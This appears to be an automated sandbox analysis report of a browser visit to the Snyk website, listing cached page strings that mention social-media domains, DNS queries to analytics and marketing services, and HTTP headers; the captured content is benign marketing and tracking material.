imageSrcSet="/_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1717461856%2Ffeature-snyk-snowflake.jpg&amp;w=384&amp;q=75 384w, /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1717461856%2Ffeature-snyk-snowflake.jpg&amp;w=580&amp;q=75 580w, /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1717461856%2Ffeature-snyk-snowflake.jpg&amp;w=960&amp;q=75 960w, /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1717461856%2Ffeature-snyk-snowflake.jpg&amp;w=1240&amp;q=75 1240w, /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1717461856%2Ffeature-snyk-snowflake.jpg&amp;w=2560&amp;q=75 2560w" imageSizes="(min-width: 980px) 50vw, 100vw" fetchpriority="high"/><link rel="preload" as="image" imageSrcSet="/_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1727870043%2Ffeature-code-rise.png&amp;w=384&amp;q=75 384w, /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1727870043%2Ffeature-code-rise.png&amp;w=580&amp;q=75 580w, /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1727870043%2Ffeature-code-rise.png&amp;w=960&amp;q=75 960w, /_next/image/
Source: chromecache_521.2.drString found in binary or memory: <!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title>See Snyk in action - Book a live demo | Snyk</title><meta name="robots" content="index,follow,max-image-preview:large"/><meta name="description" content="Chat with us today to see how Snyk can empower developers to handle security in existing workflows, measure AppSec program success with contextual risk visibility, and more."/><link rel="alternate" hrefLang="x-default" href="https://snyk.io/schedule-a-demo/"/><link rel="alternate" hrefLang="en" href="https://snyk.io/schedule-a-demo/"/><link rel="alternate" hrefLang="de" href="https://snyk.io/de/schedule-a-demo/"/><link rel="alternate" hrefLang="fr" href="https://snyk.io/fr/schedule-a-demo/"/><link rel="alternate" hrefLang="ja" href="https://snyk.io/jp/schedule-a-demo/"/><link rel="alternate" hrefLang="pt-BR" href="https://snyk.io/pt-BR/schedule-a-demo/"/><meta name="twitter:card" content="summary_large_image"/><meta property="og:title" content="See Snyk in action - Book a live demo | Snyk"/><meta property="og:description" content="Chat with us today to see how Snyk can empower developers to handle security in existing workflows, measure AppSec program success with contextual risk visibility, and more."/><meta property="og:url" content="https://snyk.io/schedule-a-demo/"/><meta property="og:image" content="/_next/static/media/default-snyk.8953a9bd.jpg"/><meta property="og:image:alt" content="Snyk | Developer Security Platform"/><meta property="og:image:width" content="1200"/><meta property="og:image:height" content="628"/><meta property="og:locale" content="en-US"/><meta property="og:site_name" content="Snyk"/><link rel="canonical" href="https://snyk.io/schedule-a-demo/"/><script type="application/ld+json">{"@context":"https://schema.org","@type":"Organization","@id":"https://snyk.io/#organization","name":"Snyk","url":"https://snyk.io","logo":"https://res.cloudinary.com/snyk/image/upload/v1588772106/title-card-vertical-white-1.png","sameAs":["https://www.facebook.com/snyksec/","https://twitter.com/snyksec"]}</script><meta name="next-head-count" content="23"/><script id="google-tag-manager-datalayer-init" data-nscript="beforeInteractive"> equals www.facebook.com (Facebook)
Source: chromecache_521.2.drString found in binary or memory: <!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title>See Snyk in action - Book a live demo | Snyk</title><meta name="robots" content="index,follow,max-image-preview:large"/><meta name="description" content="Chat with us today to see how Snyk can empower developers to handle security in existing workflows, measure AppSec program success with contextual risk visibility, and more."/><link rel="alternate" hrefLang="x-default" href="https://snyk.io/schedule-a-demo/"/><link rel="alternate" hrefLang="en" href="https://snyk.io/schedule-a-demo/"/><link rel="alternate" hrefLang="de" href="https://snyk.io/de/schedule-a-demo/"/><link rel="alternate" hrefLang="fr" href="https://snyk.io/fr/schedule-a-demo/"/><link rel="alternate" hrefLang="ja" href="https://snyk.io/jp/schedule-a-demo/"/><link rel="alternate" hrefLang="pt-BR" href="https://snyk.io/pt-BR/schedule-a-demo/"/><meta name="twitter:card" content="summary_large_image"/><meta property="og:title" content="See Snyk in action - Book a live demo | Snyk"/><meta property="og:description" content="Chat with us today to see how Snyk can empower developers to handle security in existing workflows, measure AppSec program success with contextual risk visibility, and more."/><meta property="og:url" content="https://snyk.io/schedule-a-demo/"/><meta property="og:image" content="/_next/static/media/default-snyk.8953a9bd.jpg"/><meta property="og:image:alt" content="Snyk | Developer Security Platform"/><meta property="og:image:width" content="1200"/><meta property="og:image:height" content="628"/><meta property="og:locale" content="en-US"/><meta property="og:site_name" content="Snyk"/><link rel="canonical" href="https://snyk.io/schedule-a-demo/"/><script type="application/ld+json">{"@context":"https://schema.org","@type":"Organization","@id":"https://snyk.io/#organization","name":"Snyk","url":"https://snyk.io","logo":"https://res.cloudinary.com/snyk/image/upload/v1588772106/title-card-vertical-white-1.png","sameAs":["https://www.facebook.com/snyksec/","https://twitter.com/snyksec"]}</script><meta name="next-head-count" content="23"/><script id="google-tag-manager-datalayer-init" data-nscript="beforeInteractive"> equals www.twitter.com (Twitter)
Source: chromecache_321.2.drString found in binary or memory: <a tabindex="0" href="/policies/privacy/"><strong>Privacy Policy</strong></a></p></div></div><div class="cols-12 max-w-6 marg-t-extra-large"><div><div class="w-full patch pose-alert" data-component="Patch"></div></div></div></div></section></main><footer class="brandui-footer"><div class="footer-content content-block"><nav class="footer-navigation"><div class="footer-column"><h2 class="footer-column-title txt-mini-header-small">Products &amp; Solutions</h2><ul class="footer-links"><li><a class="d-block" tabindex="0" href="/product/">What is Snyk?</a></li><li><a class="d-block" tabindex="0" href="/platform/">Developer Security Platform</a></li><li><a class="d-block" tabindex="0" href="/plans/">Pricing</a></li></ul></div><div class="footer-column"><h2 class="footer-column-title txt-mini-header-small">Our Resources</h2><ul class="footer-links"><li><a class="d-block" tabindex="0" href="/resource-library/">Resource library</a></li><li><a class="d-block" tabindex="0" href="/blog/">Blog</a></li><li><a class="d-block" tabindex="0" href="/podcasts/the-secure-developer/">The Secure Developer Podcast</a></li></ul></div><div class="footer-column"><h2 class="footer-column-title txt-mini-header-small">Our Ecosystem</h2><ul class="footer-links"><li><a class="d-block" tabindex="0" href="/platform/learn/">Snyk Learn</a></li><li><a href="https://docs.snyk.io/" rel="noopener noreferrer" target="_blank" tabindex="0" class="d-block">Snyk User Docs</a></li><li><a href="https://support.snyk.io/hc/en-us" rel="noopener noreferrer" target="_blank" tabindex="0" class="d-block">Snyk Support</a></li><li><a href="https://security.snyk.io/" rel="noopener noreferrer" target="_blank" tabindex="0" class="d-block">Snyk Vuln Database</a></li><li><a href="https://updates.snyk.io/" rel="noopener noreferrer" target="_blank" tabindex="0" class="d-block">Snyk Updates</a></li></ul></div><div class="footer-column"><h2 class="footer-column-title txt-mini-header-small">Company &amp; Community</h2><ul class="footer-links"><li><a class="d-block" tabindex="0" href="/about/">About Snyk</a></li><li><a class="d-block" tabindex="0" href="/contact-us/">Contact us</a></li><li><a class="d-block" tabindex="0" href="/schedule-a-demo/">Book a demo</a></li><li><a class="d-block" tabindex="0" href="/careers/">Careers</a></li><li><a class="d-block" tabindex="0" href="/events/">Events &amp; webinars</a></li><li><a class="d-block" tabindex="0" href="/snyk-ambassadors/">Ambassadors</a></li></ul></div><div class="footer-column"><h2 class="footer-column-title txt-mini-header-small">Why Snyk</h2><ul class="footer-links"><li><a class="d-block" tabindex="0" href="/comparison/github-and-snyk/">Snyk With GitHub</a></li><li><a class="d-block" tabindex="0" href="/comparison/snyk-vs-veracode/">Snyk vs Veracode</a></li><li><a class="d-block" tabindex="0" href="/comparison/snyk-vs-checkmarx/">Snyk vs Checkmarx</a></li><li><a class="d-block" tabindex="0" href="/comparison/snyk-vs-synopsys/">Snyk vs Synopsys</a></li></ul><
Source: chromecache_321.2.drString found in binary or memory: <a tabindex="0" href="/policies/privacy/"><strong>Privacy Policy</strong></a></p></div></div><div class="cols-12 max-w-6 marg-t-extra-large"><div><div class="w-full patch pose-alert" data-component="Patch"></div></div></div></div></section></main><footer class="brandui-footer"><div class="footer-content content-block"><nav class="footer-navigation"><div class="footer-column"><h2 class="footer-column-title txt-mini-header-small">Products &amp; Solutions</h2><ul class="footer-links"><li><a class="d-block" tabindex="0" href="/product/">What is Snyk?</a></li><li><a class="d-block" tabindex="0" href="/platform/">Developer Security Platform</a></li><li><a class="d-block" tabindex="0" href="/plans/">Pricing</a></li></ul></div><div class="footer-column"><h2 class="footer-column-title txt-mini-header-small">Our Resources</h2><ul class="footer-links"><li><a class="d-block" tabindex="0" href="/resource-library/">Resource library</a></li><li><a class="d-block" tabindex="0" href="/blog/">Blog</a></li><li><a class="d-block" tabindex="0" href="/podcasts/the-secure-developer/">The Secure Developer Podcast</a></li></ul></div><div class="footer-column"><h2 class="footer-column-title txt-mini-header-small">Our Ecosystem</h2><ul class="footer-links"><li><a class="d-block" tabindex="0" href="/platform/learn/">Snyk Learn</a></li><li><a href="https://docs.snyk.io/" rel="noopener noreferrer" target="_blank" tabindex="0" class="d-block">Snyk User Docs</a></li><li><a href="https://support.snyk.io/hc/en-us" rel="noopener noreferrer" target="_blank" tabindex="0" class="d-block">Snyk Support</a></li><li><a href="https://security.snyk.io/" rel="noopener noreferrer" target="_blank" tabindex="0" class="d-block">Snyk Vuln Database</a></li><li><a href="https://updates.snyk.io/" rel="noopener noreferrer" target="_blank" tabindex="0" class="d-block">Snyk Updates</a></li></ul></div><div class="footer-column"><h2 class="footer-column-title txt-mini-header-small">Company &amp; Community</h2><ul class="footer-links"><li><a class="d-block" tabindex="0" href="/about/">About Snyk</a></li><li><a class="d-block" tabindex="0" href="/contact-us/">Contact us</a></li><li><a class="d-block" tabindex="0" href="/schedule-a-demo/">Book a demo</a></li><li><a class="d-block" tabindex="0" href="/careers/">Careers</a></li><li><a class="d-block" tabindex="0" href="/events/">Events &amp; webinars</a></li><li><a class="d-block" tabindex="0" href="/snyk-ambassadors/">Ambassadors</a></li></ul></div><div class="footer-column"><h2 class="footer-column-title txt-mini-header-small">Why Snyk</h2><ul class="footer-links"><li><a class="d-block" tabindex="0" href="/comparison/github-and-snyk/">Snyk With GitHub</a></li><li><a class="d-block" tabindex="0" href="/comparison/snyk-vs-veracode/">Snyk vs Veracode</a></li><li><a class="d-block" tabindex="0" href="/comparison/snyk-vs-checkmarx/">Snyk vs Checkmarx</a></li><li><a class="d-block" tabindex="0" href="/comparison/snyk-vs-synopsys/">Snyk vs Synopsys</a></li></ul><
Source: chromecache_321.2.drString found in binary or memory: <a tabindex="0" href="/policies/privacy/"><strong>Privacy Policy</strong></a></p></div></div><div class="cols-12 max-w-6 marg-t-extra-large"><div><div class="w-full patch pose-alert" data-component="Patch"></div></div></div></div></section></main><footer class="brandui-footer"><div class="footer-content content-block"><nav class="footer-navigation"><div class="footer-column"><h2 class="footer-column-title txt-mini-header-small">Products &amp; Solutions</h2><ul class="footer-links"><li><a class="d-block" tabindex="0" href="/product/">What is Snyk?</a></li><li><a class="d-block" tabindex="0" href="/platform/">Developer Security Platform</a></li><li><a class="d-block" tabindex="0" href="/plans/">Pricing</a></li></ul></div><div class="footer-column"><h2 class="footer-column-title txt-mini-header-small">Our Resources</h2><ul class="footer-links"><li><a class="d-block" tabindex="0" href="/resource-library/">Resource library</a></li><li><a class="d-block" tabindex="0" href="/blog/">Blog</a></li><li><a class="d-block" tabindex="0" href="/podcasts/the-secure-developer/">The Secure Developer Podcast</a></li></ul></div><div class="footer-column"><h2 class="footer-column-title txt-mini-header-small">Our Ecosystem</h2><ul class="footer-links"><li><a class="d-block" tabindex="0" href="/platform/learn/">Snyk Learn</a></li><li><a href="https://docs.snyk.io/" rel="noopener noreferrer" target="_blank" tabindex="0" class="d-block">Snyk User Docs</a></li><li><a href="https://support.snyk.io/hc/en-us" rel="noopener noreferrer" target="_blank" tabindex="0" class="d-block">Snyk Support</a></li><li><a href="https://security.snyk.io/" rel="noopener noreferrer" target="_blank" tabindex="0" class="d-block">Snyk Vuln Database</a></li><li><a href="https://updates.snyk.io/" rel="noopener noreferrer" target="_blank" tabindex="0" class="d-block">Snyk Updates</a></li></ul></div><div class="footer-column"><h2 class="footer-column-title txt-mini-header-small">Company &amp; Community</h2><ul class="footer-links"><li><a class="d-block" tabindex="0" href="/about/">About Snyk</a></li><li><a class="d-block" tabindex="0" href="/contact-us/">Contact us</a></li><li><a class="d-block" tabindex="0" href="/schedule-a-demo/">Book a demo</a></li><li><a class="d-block" tabindex="0" href="/careers/">Careers</a></li><li><a class="d-block" tabindex="0" href="/events/">Events &amp; webinars</a></li><li><a class="d-block" tabindex="0" href="/snyk-ambassadors/">Ambassadors</a></li></ul></div><div class="footer-column"><h2 class="footer-column-title txt-mini-header-small">Why Snyk</h2><ul class="footer-links"><li><a class="d-block" tabindex="0" href="/comparison/github-and-snyk/">Snyk With GitHub</a></li><li><a class="d-block" tabindex="0" href="/comparison/snyk-vs-veracode/">Snyk vs Veracode</a></li><li><a class="d-block" tabindex="0" href="/comparison/snyk-vs-checkmarx/">Snyk vs Checkmarx</a></li><li><a class="d-block" tabindex="0" href="/comparison/snyk-vs-synopsys/">Snyk vs Synopsys</a></li></ul><
Source: chromecache_448.2.dr, chromecache_546.2.drString found in binary or memory: c?"runIfCanceled":"runIfUncanceled",[]);if(!g.length)return!0;var k=WA(a,c,e);U(121);if(k["gtm.elementUrl"]==="https://www.facebook.com/tr/")return U(122),!0;if(d&&f){for(var m=Kb(b,g.length),n=0;n<g.length;++n)g[n](k,m);return m.done}for(var p=0;p<g.length;++p)g[p](k,function(){});return!0},ZA=function(){var a=[],b=function(c){return pb(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);return d?d.button:null}}}, equals www.facebook.com (Facebook)
Source: chromecache_333.2.dr, chromecache_437.2.dr, chromecache_602.2.dr, chromecache_300.2.dr, chromecache_448.2.dr, chromecache_388.2.dr, chromecache_557.2.dr, chromecache_546.2.dr, chromecache_604.2.dr, chromecache_532.2.dr, chromecache_598.2.dr, chromecache_593.2.drString found in binary or memory: return b}nD.F="internal.enableAutoEventOnTimer";var gc=ma(["data-gtm-yt-inspected-"]),pD=["www.youtube.com","www.youtube-nocookie.com"],qD,rD=!1; equals www.youtube.com (Youtube)
Source: chromecache_469.2.dr, chromecache_403.2.drString found in binary or memory: s also remember to educate others as well as ourselves. A great reminder from Tori:","marks":[],"data":{}}]},{"nodeType":"embedded-entry-block","data":{"target":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4TprcCrZh8rxTEUZTriKIH","type":"Entry","createdAt":"2023-05-25T15:00:17.229Z","updatedAt":"2023-05-25T15:00:17.229Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":3,"revision":1,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"contentCloudinaryAsset"}},"locale":"en-US"},"fields":{"internalName":"\"blog-aapi-month-Tori\" - original","asset":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1685025413/blog-aapi-month-Tori.jpg","tags":[],"type":"upload","bytes":240092,"width":1200,"format":"jpg","height":1200,"version":1685025413,"duration":null,"metadata":[],"public_id":"blog-aapi-month-Tori","created_at":"2023-05-25T14:36:53Z","secure_url":"https://res.cloudinary.com/snyk/image/upload/v1685025413/blog-aapi-month-Tori.jpg","resource_type":"image","raw_transformation":""}],"maxWidth":"large"}}},"content":[]},{"nodeType":"paragraph","data":{},"content":[{"nodeType":"text","value":"To hear more from these Snykers this month, or other Snykers throughout the year, tune in to our social media and check out our ","marks":[{"type":"italic"}],"data":{}},{"nodeType":"hyperlink","data":{"uri":"https://www.linkedin.com/search/results/all/?keywords=%23lifeatsnyk&origin=GLOBAL_SEARCH_HEADER&sid=)~P"},"content":[{"nodeType":"text","value":"#LifeAtSnyk","marks":[{"type":"underline"},{"type":"italic"}],"data":{}}]},{"nodeType":"text","value":" hashtag.","marks":[{"type":"italic"}],"data":{}}]}]},"footerCta":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7a65Q2QIPRPvL8DRK8cKNJ","type":"Entry","createdAt":"2022-08-11T20:52:16.256Z","updatedAt":"2024-10-18T17:26:54.524Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":367,"revision":261,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"organismFooterCta"}},"locale":"en-US"},"fields":{"internalName":"\"Join us on our mission to make the digital world a safer place\" - Default","headline":"Join us on our mission to make the digital world a safer place","description":{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[],"value":"We equals www.linkedin.com (Linkedin)
Source: chromecache_533.2.dr, chromecache_282.2.drString found in binary or memory: s belief that the future of security depended on developer adoption. Prior to Snyk, he was CTO at Akamai and also led AppScan, an early AppSec pioneer.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"title":"Founder","company":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"BiiaijTYQ14RazfFg8UMc","type":"Entry","createdAt":"2022-11-08T15:58:24.247Z","updatedAt":"2024-05-30T04:15:21.816Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":431,"revision":424,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"contentCompany"}},"locale":"en-US"},"fields":{"companyName":"Snyk","logoHorizontal":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1645182199/snyk-marketingui/brand-logos/wordmark-logo-color.svg","tags":null,"type":"upload","bytes":6792,"width":283,"format":"svg","height":146,"version":1645182199,"duration":null,"metadata":[],"public_id":"snyk-marketingui/brand-logos/wordmark-logo-color","created_at":"2022-02-18T11:03:19Z","secure_url":"https://res.cloudinary.com/snyk/image/upload/v1645182199/snyk-marketingui/brand-logos/wordmark-logo-color.svg","original_url":"http://res.cloudinary.com/snyk/image/upload/v1645182199/snyk-marketingui/brand-logos/wordmark-logo-color.svg","resource_type":"image","raw_transformation":"","original_secure_url":"https://res.cloudinary.com/snyk/image/upload/v1645182199/snyk-marketingui/brand-logos/wordmark-logo-color.svg"}],"companyUrl":"https://snyk.io/","region":"americas","size":"enterprise","isCustomer":false,"isPartner":false}},"linkedInUrl":"https://www.linkedin.com/in/guypo/"}}],"publishDate":"2021-09-09T16:02-05:00","excerpt":"It equals www.linkedin.com (Linkedin)
Source: chromecache_541.2.drString found in binary or memory: s software supply chain security solution in action.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"actions":[{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"22OXhpxdZEYRX7O6FsQmvn","type":"Entry","createdAt":"2022-07-12T15:23:04.759Z","updatedAt":"2024-10-23T17:49:19.793Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":1192,"revision":600,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"atomButton"}},"locale":"en-US"},"fields":{"internalName":" \"Book a live demo\" - Primary (use this one)","label":"Book a live demo","url":"/schedule-a-demo/","appearance":{"button":{"variant":"primary"}}}}],"appearance":{"footerCta":{"patchPose":"alert"}}}}}},{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2evltwjFgWHLRbGal9xDD5","type":"Entry","createdAt":"2022-11-07T14:50:30.349Z","updatedAt":"2024-07-18T22:34:15.870Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":48,"revision":13,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"moleculeMediaCard"}},"locale":"en-US"},"fields":{"internalName":"\"How to Mitigate the Risks of Software Supply Chain Security\" - youtube video - media card","image":[{"url":"http://res.cloudinary.com/snyk/image/upload/f_auto/q_auto/v1660040093/wordpress-sync/feature-safe-containers.png","tags":[],"type":"upload","bytes":92783,"width":1200,"format":"png","height":628,"version":1660040093,"duration":null,"metadata":[],"public_id":"wordpress-sync/feature-safe-containers","created_at":"2022-08-09T10:14:53Z","secure_url":"https://res.cloudinary.com/snyk/image/upload/f_auto/q_auto/v1660040093/wordpress-sync/feature-safe-containers.png","original_url":"http://res.cloudinary.com/snyk/image/upload/v1660040093/wordpress-sync/feature-safe-containers.png","resource_type":"image","raw_transformation":"f_auto/q_auto","original_secure_url":"https://res.cloudinary.com/snyk/image/upload/v1660040093/wordpress-sync/feature-safe-containers.png"}],"category":"video","headline":"Mitigating supply chain security risks","excerpt":"Snyk Solution Engineers discuss risk mitigation and supply chain complexity.","url":"https://www.youtube.com/watch?v=zc8fSlVerCY"}}],"appearance":{"mediaCardGrid":{}}}}],"footerCta":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5XtR1ZYDXCdickfXyAH8CP","type":"Entry","createdAt":"2022-11-04T18:43:12.014Z","updatedAt":"2024-07-11T22:28:33.965Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":56,"revision":21,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"organismFooterCta"}},"locale":"en-US"},"fields":{"internalName":"\"See Snyk in action\" - Software Supply Chain Security - Footer CTA","hea
Source: chromecache_443.2.dr, chromecache_541.2.drString found in binary or memory: t store sensitive information in a repository, in config, or in code","nodeType":"text"},{"data":{},"marks":[],"value":". We have detailed ","nodeType":"text"},{"data":{"uri":"/blog/ten-git-hub-security-best-practices/"},"content":[{"data":{},"marks":[{"type":"underline"}],"value":"10 GitHub security best practices","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[],"value":" for you to drill down to each security practice.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"list-item"},{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[{"type":"bold"}],"value":"Avoid publishing packages or container images with potentially sensitive information that can end up in public registries","nodeType":"text"},{"data":{},"marks":[],"value":". You can follow the ","nodeType":"text"},{"data":{"uri":"/blog/ten-npm-security-best-practices/"},"content":[{"data":{},"marks":[{"type":"underline"}],"value":"10 npm security best practices guidelines","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[],"value":" on configuring npm packages with proper .npmignore configurations.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"list-item"}],"nodeType":"unordered-list"},{"data":{},"content":[{"data":{},"marks":[],"value":"To delve deeper, check out this video presentation on ","nodeType":"text"},{"data":{"uri":"https://www.youtube.com/watch?v=s7N1_IK6QJE"},"content":[{"data":{},"marks":[{"type":"underline"}],"value":"How to Mitigate Risk in Software Supply Chain Security","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[],"value":"","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"marks":[],"value":"","nodeType":"text"},{"data":{"uri":"anchor:with"},"content":[{"data":{},"marks":[],"value":"How does supply chain security relate to AppSec and DevSecOps?","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[],"value":"","nodeType":"text"}],"nodeType":"heading-2"},{"data":{},"content":[{"data":{},"marks":[],"value":"Supply chain security, AppSec (","nodeType":"text"},{"data":{"uri":"/learn/application-security/"},"content":[{"data":{},"marks":[],"value":"application security","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[],"value":"), and DevSecOps (","nodeType":"text"},{"data":{"uri":"/series/devsecops/"},"content":[{"data":{},"marks":[],"value":"development, security, and operations","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[],"value":") all involve safeguarding components and systems to develop, distribute, and maintain software. equals www.youtube.com (Youtube)
Source: chromecache_448.2.dr, chromecache_546.2.drString found in binary or memory: var CC=function(a,b,c,d,e){var f=tA("fsl",c?"nv.mwt":"mwt",0),g;g=c?tA("fsl","nv.ids",[]):tA("fsl","ids",[]);if(!g.length)return!0;var k=yA(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);U(121);if(m==="https://www.facebook.com/tr/")return U(122),!0;k["gtm.elementUrl"]=m;k["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(k["gtm.interactedFormName"]=a.getAttribute("name"));e&&(k["gtm.formSubmitElement"]=e,k["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!fz(k,hz(b, equals www.facebook.com (Facebook)
Source: global trafficDNS traffic detected: DNS query: snyk.io
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
Source: global trafficDNS traffic detected: DNS query: app.usercentrics.eu
Source: global trafficDNS traffic detected: DNS query: j.6sc.co
Source: global trafficDNS traffic detected: DNS query: api.usercentrics.eu
Source: global trafficDNS traffic detected: DNS query: secure.adnxs.com
Source: global trafficDNS traffic detected: DNS query: c.6sc.co
Source: global trafficDNS traffic detected: DNS query: ipv6.6sc.co
Source: global trafficDNS traffic detected: DNS query: eps.6sc.co
Source: global trafficDNS traffic detected: DNS query: go.snyk.io
Source: global trafficDNS traffic detected: DNS query: v.eps.6sc.co
Source: global trafficDNS traffic detected: DNS query: b.6sc.co
Source: global trafficDNS traffic detected: DNS query: aggregator.service.usercentrics.eu
Source: global trafficDNS traffic detected: DNS query: consent-api.service.consent.usercentrics.eu
Source: global trafficDNS traffic detected: DNS query: analytics.google.com
Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: uct.service.usercentrics.eu
Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: cdn.segment.com
Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: assets.trendemon.com
Source: global trafficDNS traffic detected: DNS query: trackingapi.trendemon.com
Source: global trafficDNS traffic detected: DNS query: api.segment.io
Source: global trafficDNS traffic detected: DNS query: pic.trendemon.com
Source: global trafficDNS traffic detected: DNS query: snap.licdn.com
Source: global trafficDNS traffic detected: DNS query: px.ads.linkedin.com
Source: global trafficDNS traffic detected: DNS query: js.zi-scripts.com
Source: global trafficDNS traffic detected: DNS query: munchkin.marketo.net
Source: global trafficDNS traffic detected: DNS query: js.driftt.com
Source: global trafficDNS traffic detected: DNS query: www.linkedin.com
Source: global trafficDNS traffic detected: DNS query: scout-cdn.salesloft.com
Source: global trafficDNS traffic detected: DNS query: tracking.intentsify.io
Source: global trafficDNS traffic detected: DNS query: scout.salesloft.com
Source: global trafficDNS traffic detected: DNS query: ws.zoominfo.com
Source: global trafficDNS traffic detected: DNS query: 677-thp-415.mktoresp.com
Source: global trafficDNS traffic detected: DNS query: customer.api.drift.com
Source: global trafficDNS traffic detected: DNS query: conversation.api.drift.com
Source: global trafficDNS traffic detected: DNS query: metrics.api.drift.com
Source: global trafficDNS traffic detected: DNS query: targeting.api.drift.com
Source: unknownHTTP traffic detected: POST /_vercel/insights/view HTTP/1.1Host: snyk.ioConnection: keep-aliveContent-Length: 111sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: https://snyk.ioSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: public, max-age=0, must-revalidateContent-Length: 42Content-Type: application/json; charset=utf-8Cross-Origin-Resource-Policy: cross-originServer: VercelX-Vercel-Id: fra1::fvsx7-1729799364759-1d4c3860140fDate: Thu, 24 Oct 2024 19:49:24 GMTConnection: closeX-Content-Type-Options: nosniffX-Xss-Protection: 1; mode=blockStrict-Transport-Security: max-age=31536000; preloadAkamai-Cache-Status: NotCacheable from childAkamai-GRN: 0.42284317.1729799364.10989f0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: public, max-age=0, must-revalidateContent-Length: 42Content-Type: application/json; charset=utf-8Cross-Origin-Resource-Policy: cross-originServer: VercelX-Vercel-Id: fra1::5r6zz-1729799373637-a9614a0ed7e4Date: Thu, 24 Oct 2024 19:49:33 GMTConnection: closeX-Content-Type-Options: nosniffX-Xss-Protection: 1; mode=blockStrict-Transport-Security: max-age=31536000; preloadAkamai-Cache-Status: NotCacheable from childAkamai-GRN: 0.42284317.1729799373.109b45c
